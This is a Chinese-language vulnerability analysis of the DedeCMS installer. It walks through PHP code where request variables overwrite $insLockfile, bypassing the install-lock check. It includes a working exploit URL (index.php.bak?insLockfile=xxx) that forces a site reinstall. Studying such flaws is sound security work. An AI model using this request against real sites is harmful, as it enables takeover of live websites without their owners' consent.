Dedecms通杀重装漏洞的一次分析

...

$insLockfile = dirname(__FILE__).'/install_lock.txt';//初始化$insLockfile，防止register_globals= on，初始化的值是“目录/install_lock.txt”

....

if(file_exists($insLockfile))

/*file_exists() 函数检查文件或目录是否存在。如果指定的文件或目录存在则返回 true，否则返回 false

也就是说我们要想办法让他变成false原因是因为true就会执行exit函数，exit函数的特点就是输出字符串，然后就会停止执行下面的代码，也就相当于结束，而下面的命令是重装的相关代码，所以要想办法让file_exists($insLockfile)返回假

关键变量$insLockfile已经初始化，那么只能找办法覆盖*/

{

    exit(" 程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！");

}

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

    foreach($$_request as $_k => $_v)

{

${$_k} = RunMagicQuotes($_v);

}

}

foreach(Array('_GET','_POST','_COOKIE') as $_request)//第一次循环,$_request=array[0]也就是"_GET"了

{

    foreach($$_request as $_k => $_v)

/*什么意思呢？foreach不说了，说里面的,$$_request 把值赋给$_v,“$$_request”是个可变变量,根据上面$_request的值,得出$$_request=$_GET把值代入代码中得出

foreach($_GET as $_k => $_v)

根据多次尝试,用get方式发送a=b，$_GET会吧a作为下标（键），b作为值（键值）,所以此时$_k=“insLockfile”，$_v=“xxx”，但是还是没有当成一个命令来执行，继续看下面这那段代码

 */

{

${$_k} = RunMagicQuotes($_v);

/*又是一个可变变量,

把上面的值都带入进去得${insLockfile} = RunMagicQuotes(“xxx”);

也就是$insLockfile = RunMagicQuotes(“xxx”);

哈哈，没错我们的exp（http://url/dedecms/install/index.php.bak?insLockfile=xxx）相当于让dedecms执行了$insLockfile = RunMagicQuotes(“xxx”);

这段关键的覆盖变量的代码貌似还是防注入的，哈哈RunMagic貌似是魔术引号的修改版，如果是的话就执行这段代码$insLockfile =“xxx”

*/

}

}